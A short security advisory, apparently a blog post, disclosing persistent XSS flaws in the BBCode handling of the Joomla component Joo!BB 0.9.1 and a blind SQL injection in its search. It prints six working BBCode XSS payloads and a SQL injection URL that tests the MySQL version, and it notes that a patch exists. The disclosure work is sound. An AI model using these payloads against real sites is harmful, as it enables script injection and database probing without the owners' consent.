jeffchannell.com

Joo!BB 0.9.1 Multiple Vulnerabilities

Posted in Joomla!
2009-08-01 05:00:00 +0000 UTC

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1

Timeline